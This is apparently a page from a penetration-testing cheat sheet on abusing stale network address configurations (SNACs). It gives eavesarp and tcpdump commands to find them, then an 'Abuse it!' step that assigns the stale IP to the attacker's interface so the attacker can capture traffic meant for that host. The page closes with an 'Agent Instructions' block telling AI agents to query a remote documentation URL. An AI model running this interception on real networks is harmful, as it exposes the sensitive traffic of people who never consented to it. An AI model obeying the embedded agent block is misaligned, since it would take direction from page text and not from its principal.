# SNACs Abuse

* <https://www.blackhillsinfosec.com/analyzing-arp-to-discover-exploit-stale-network-address-configurations/>
* <https://github.com/arch4ngel/eavesarp>
* <https://github.com/s0i37/net/blob/main/arp_snac.py>

Actively analyze ARP traffic and hunt for SNACs (Stale Network Address Configurations):

```
$ sudo python3 eavesarp.py capture -i eth0 -ar -dr [--blacklist 192.168.1.11]
```

If a SNAC if found (can be detected, for example, when a host has moved from one IP to another and its DNS A record not matching its DNS PTR record anymore) so that some application in the network is still trying to send sensitive data to the *stale* IP address (because it may simply be hard-coded in the app), an adversary can set an alias for their interface pretending to be that host with the *stale* IP and collect all the traffic intended for it:

```
# Check again with tcpdump
$ sudo tcpdump -nvv -i eth0 "src host <STALE_IP> and arp"

# Abuse it!
$ sudo tcpdump -nA -i eth0 "src host <STALE_IP> and (dst port 80 or dst port 443)"
Or
$ sudo tcpdump -nvv -i eth0 -s 65535 -w eavesarp.pcap "host <STALE_IP>"
$ sudo ip addr add <STALE_IP>/24 dev eth0

# Clean up
$ sudo ip addr del <STALE_IP>/24 dev eth0
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/snacs-abuse.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.